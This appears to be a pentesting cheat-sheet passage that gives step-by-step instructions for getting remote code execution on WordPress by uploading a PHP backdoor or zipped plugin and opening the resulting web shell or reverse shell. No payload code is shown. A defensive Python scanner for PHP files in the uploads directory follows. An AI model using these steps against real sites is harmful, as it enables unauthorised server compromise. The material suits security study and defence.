CMS

WordPress

Plugin RCE

If we can upload PHP files as plugins

It may be possible to upload .php files as a plugin. Create your PHP backdoor using, for example:

Then add a new plugin:

Upload plugin and press Install Now:

Click on Proceed:

This will probably appear to do nothing, but if you go to Media, you will see your shell uploaded:

Access it and you will see the URL to execute the reverse shell:

If we can't upload php files as plugins

  1. Create the PHP code

  2. Zip the PHP file

  3. Upload the zip as a plugin

  4. Activate the plugin
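
For the first case above, where the uploaded .php file shows up under Media (the wp-content/uploads directory on a default install), a defender can sweep that directory for files the server could run as PHP. The script below is an added example, not part of the original notes; the extension list, the function names and the sample files are assumptions constructed for the demonstration.

```python
import os
import re
import tempfile

# Assumption: extensions the web server may hand to PHP; match your handler config.
PHP_EXTENSIONS = {".php", ".phtml", ".phar", ".pht", ".php5", ".php7"}
PHP_OPEN_TAG = re.compile(rb"<\?php", re.IGNORECASE)

def scan_uploads(uploads_dir, head_bytes=65536):
    """Return sorted (relative_path, reason) findings under uploads_dir."""
    findings = []
    for root, _dirs, files in os.walk(uploads_dir):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, uploads_dir)
            # Test every dot-separated suffix so "x.php.png" is caught too.
            suffixes = {"." + part.lower() for part in name.split(".")[1:]}
            if suffixes & PHP_EXTENSIONS:
                findings.append((rel, "php-extension"))
                continue
            try:
                with open(path, "rb") as fh:
                    head = fh.read(head_bytes)
            except OSError:
                findings.append((rel, "unreadable"))
                continue
            if PHP_OPEN_TAG.search(head):
                findings.append((rel, "php-open-tag"))
    return sorted(findings)

def demo():
    """Scan a constructed uploads tree (sample files are made up for this example)."""
    with tempfile.TemporaryDirectory() as top:
        month = os.path.join(top, "2024", "01")
        os.makedirs(month)
        samples = {
            "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
            "upload.php": b"<?php echo 'constructed'; ?>",
            "avatar.php.png": b"\x89PNG\r\n\x1a\n",
            "notes.txt": b"header\n<?PHP /* constructed */ ?>",
        }
        for name, data in samples.items():
            with open(os.path.join(month, name), "wb") as fh:
                fh.write(data)
        return scan_uploads(top)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:14} {rel}")
```

Point `scan_uploads` at the site's real uploads path and review every finding; a media directory should contain no PHP at all, so blocking PHP execution there at the web-server level is the complementary control.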
